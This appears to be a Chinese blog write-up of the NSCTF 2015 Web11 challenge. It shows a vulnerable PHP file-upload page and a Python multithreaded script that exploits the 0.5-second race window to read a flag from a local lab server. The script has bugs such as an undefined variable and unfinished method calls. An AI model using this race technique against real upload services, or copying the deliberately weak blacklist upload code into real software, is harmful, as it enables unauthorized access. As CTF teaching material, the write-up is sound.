【NSCTF 2015】 Web11(典型入门条件竞争实例)

最新推荐文章于 2024-04-28 05:16:39 发布
最新推荐文章于 2024-04-28 05:16:39 发布
阅读量732 收藏 1
点赞数
分类专栏: Web刷题记录 文章标签: php python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/109506480
版权

前言

文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!

Web11

这题很典型,是一个不错的条件竞争例子,十分值得做下记录
源码:

<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>NSCTF</title>
</head>
<body alink="#007000" background="../images/dot.gif" bgcolor="#000000" link="gold" text="#008000" vlink="#00c000">
<br>
<br>
<br>
<center>
<head><h1>请上传文件!</h1></head><br>
<br>
<br><br>
<form method="post" action="index.php" enctype="multipart/form-data">
 <input type="file" name="file" value="1111"/>
 <input type="submit" name="submit" value="upload"/>
</form>
</center>

<?php

error_reporting(0);

if(isset($_POST['submit'])){
  
  $savefile = $_FILES['file']['name'];
  $savefile = preg_replace("/\.\.|\%/", "", $savefile);
  $tempfile = $_FILES['file']['tmp_name'];
  //$savefile = preg_replace("/(php|php3|php4)(\.|$)/i", "_\\1\\2", $savefile);
  $savefile = preg_replace("/(php|phtml|php3|php4|jsp|exe|dll|asp|cer|asa|shtml|shtm|aspx|asax|cgi|fcgi|pl)(\.|$)/i", "_\\1\\2", $savefile);
  $savefile = 'upload/'.$savefile;

  if(move_uploaded_file($tempfile,$savefile)){
    
    //$filename = substr($savefile,0,strlen($savefile)-1);
    $filename = $savefile;
    
    if(file_exists($filename) && ( (substr($savefile, -5) == '.php5') )){
        file_put_contents($filename, "flag:{NSCTF_8f0fc74ddf786103ed56d20af3bf269}");
        sleep(0.5);
        unlink($filename);
        exit('上传成功,文件地址为:'.$savefile."<br>"."但是系统检测到恶意上传立马又被删了~");
      }else{
    unlink($filename);
        exit('上传成功,文件地址为:'.$savefile."<br>");
      }
  }else{
    exit('上传失败~'."<br>");
  }

}

function upload($src,$dst){
 
  if(move_uploaded_file($src,$dst)){
      return true;
  }

  return false;

}
?>

审计后功能简述:

1.功能是文件上传
2.正则过滤了很多后缀,只能用php5后缀
3.会把flag写到.php5后缀文件内,过0.5秒会删除文件

这个代码写的很死,但没有关系,我们可以只学习做题思路与方法
思路:

虽然代码中写着上传文件会给删除,但这并不能比上脚本的速度,很明显解题思想就浮现出来了,我们只需要写个脚本,同时完成上传与访问的功能,利用中间的0.5s间隙就可以通过条件竞争漏洞拿到flag

脚本:

import sys
import requests
import threading
url1="http://127.0.0.1:8080/"
url2="http://127.0.0.1:8080/upload/1.php5"
def upload(url):
	header={用BurpSuite抓包后,照着头部用字典的格式抄进去就行}
	files = {'file':open('C:\\1.php5','rb')}#此处是重点!我们操作文件上传的时候,把目标文件以open打开,然后存储到变量file里面存到一个字典里面
	upload_data={"fileSize":27,"fileName":"1.php5"}
	upload_res=requests.post(upload_url,upload_data,files=files,headers=header)##此处是重点!我们操作文件上传的时候,接口请求参数直接存到upload_data变量里面,在请求的时候,直接作为数据传递过去
def get(url):
	try:
		result=requests.get(url)
		if "flag" in result.content:
			print result.content
	except:
		pass
def main():
	while True:
		t1=threading.Thread(target=upload,args=(url1,)).start
		t2=threading.Thread(target=get,args=(url2,)).start
		t1.join()
		t2.join()
if __name__=='__main__':
	sys.exit(int(main() or 0))

利用requests完成文件上传知识点:

上传接口的参数如下所示:
upload_data={"parentId":"","fileCategory":"personal","fileSize":179,"fileName":"summer_text_0920.txt","uoType":1}
其中有两个参数需要跟大家解释一下:filesize:指的是文件的字节大小。 filename:指的是你上传之后保存的文件名~记得不要搞错了后缀哟。其他的参数可以忽略!

小 白 萝 卜
关注
专栏目录
C++软件调试与异常排查从入门到精通系列文章汇总
dvlinker的技术专栏
06-29 17万+
根据近几年排查软件异常的实践与经验,系统地讲解了C++软件异常常见原因与常用排查方法,以图文并茂的方式给出具体的分析实例,带领大家逐步掌握C++软件异常排查的相关技术与要领。
一个实例快速入门Django web开发
Reiki的专栏
06-30 2276
一 前言 前面几节以图书管理系统开发为切入点,对Django涉及的几个核心概念点进行了介绍,但缺乏连贯性。本文将从头到尾完成一个简单的实例项目,把Django开发流程串联一遍,对想了解或学习Django Web开发的同学应该会有一点帮助。 二 Django入门实例 准备开发环境 以windows系统为例,提前安装好Python3、Django2、Pycharm,在此不再赘述。 ...
【Writeup】2015NSCTF
wintersun的地带
10-26 6846
web:       be careful:                    发现有跳转,php跳转至html,flag在php页面,BP是神器。       decode:                               解密脚本如下:                            functiondecode($str){
CTF-【NSCTF 2015WEB11 条件竞争
关注网络安全、云原生安全
12-21 5006
简介 条件竞争是指多进程/多线程情况下对于共享资源没有加锁,导致的问题。 源代码 <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>NSCTF</title> </head> <body alink="#007000" background="../images/dot.gif" bgcolor="#
NSCTF web200——实验吧
weixin_33749131的博客
06-08 318
今天有点时间就多写几篇解题思路吧, 希望能够帮助到那些需要帮助的人, 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 这一题我是使用两种方法写出来的,希望能够帮助到你们!!!! 永远爱你们的————新宝宝 NSCTF web200分值:20 来源:2015NSCTF真题 难度:中 参...
NSCTF web200
weixin_30764883的博客
03-21 55
刚恰完饭,看了道题目,好久没做PHP的了,是个编码的题目 代码审计下,查下函数,意思就是定义了一个函数encode,请别把flag反转然后把反转后的每个字符变成ascii+1再变成字符呗,然后连接起来。最后返回的是base64 编码过后再反转再Rot13编码后的密文:a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws ...
2017nsctf RE
snowleopard_bin的博客
03-17 671
第一次不看任何参考资料的情况下(关键是在网上找writeup也找不到)做出一道逆向题,特此记录直接拖进IDA找到关键字符串Congrs,点进去看函数理解下函数逻辑:v13=10-&gt;循环10次Congras后面的v4应该就是结果要使v14!=0,就要是37行中v9==v12^v8v12的形成过程就是循环i次计算v8可以理解成v4,就是结果v9是byte_6B4270字符串,进去看看是什么好了,...
Dubbo入门实例Demo
04-09
【Dubbo入门实例Demo】是针对初学者设计的一个实践教程,旨在帮助新手快速理解并掌握Apache Dubbo这一高性能、轻量级的Java RPC框架。在学习过程中,新手往往会在配置、依赖、通信等方面遇到诸多问题,这个Demo就是...
adams入门详解以及21个典型实例分析
07-01
adams入门详解,其中还包含有21个实例的txt文档,只需在adams界面下打开这些文档就可以看到造型和分析画面。
C#入门必看的实例程序100个
04-07
C#入门必看的实例程序100个,感觉挺好的,简单便于学习,初学者可以看一看,
实验吧-NSCTF web200 writeup
qq_24966613的博客
11-26 1609
<?php $str = "a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; $_o=""; $_ = base64_decode(strrev(str_rot13($str))); for($_0=0;$_0<strlen($_);$_0++) { $_c = substr($_,$_0,1); $__ =
NSCTF crypto100
HotWind66的博客
08-23 799
原题链接:http://www.shiyanbar.com/ctf/1766 方法一: kali 中用binwlak打开 之后用foremost分离两张图片 方法二: 用winhex打开可发现jpg文件头信息(FF D8)多次出现,将最后一个头信息到与其最近尾信息(FF D9)的数据拷贝放入一个新文件中, 打开新文件即为flag图,但是这样提取的flag图模
CTF-【NSCTF 2015WEB11 条件竞争_nsctf 2015 web
最新发布
2401_84297193的博客
04-28 339
exit('上传成功,文件地址为:'.$savefile."exit('上传成功,文件地址为:'.$savefile.""."但是系统检测到恶意上传立马又被删了~");exit('上传失败~'."exit(‘上传失败~’.“
NSCTF Code Php
qq_53460654的博客
05-14 185
打开环境 查看源码 发现问题 访问 <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ if(!strcmp($v
nsctf php version,绿盟杯NSCTF(CCTF)2017 pwn writeup
weixin_33034651的博客
03-21 290
前言比赛有无数值得吐槽的地方,其中最主要的是,题目给了pwn的libc,然而,特么是错的,也就是说虽然给了libc,但是其实还是靠运气/当做没有libc解,顺手记录一下这两个水题。pwn1分析mainint __cdecl main(){alarm(0x1u);setbuf(stdin, 0);setbuf(stdout, 0);setbuf(stderr, 0);puts("[*]Put You...
NSCTF2017-SteinsGate wp
sherlly666的博客
07-22 2464
0x00 前言挺不错的一道题,思路值得学习,所以简单记录下。0x01 恢复文件查看文件头为PK,改后缀名为zip,解压得到三个文件,分别是 flag.enc:加密后的flag encryption:加密算法脚本 一段base64:解码后转二进制文件,查看文件头JFIF,为图片(DivergenceMeter.jpg) 0x02 读加密算法逻辑算法逻辑主要可分为两部分:1.对t0的求解。其中t0的值和
NSCTF-ZJPC-Crypto
weixin_45734980的博客
07-22 461
编码和加密这两个东西, 需要数学基础我没有。还需要脑洞我也没有 :-< ,祝大家玩的开心:-) 1、签到 签到题划划水,盲猜各种编码形式都可以。不过没有“=”可不代表不是base64哦[滑稽] base64解码三次即可获得flag。 2、密码学 一个字母矩阵???可是第一行出现了F…L…A的字样就觉得眼熟。那就每隔两个取出来就好啦。不过取出的时候有一点小技巧:直接抄下来每三个换一行,就像这样 竖着读就能获取flag啦。(感谢二狗同学的提醒) 3、解密 最开始没有txt的时候,二狗同学猜是
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值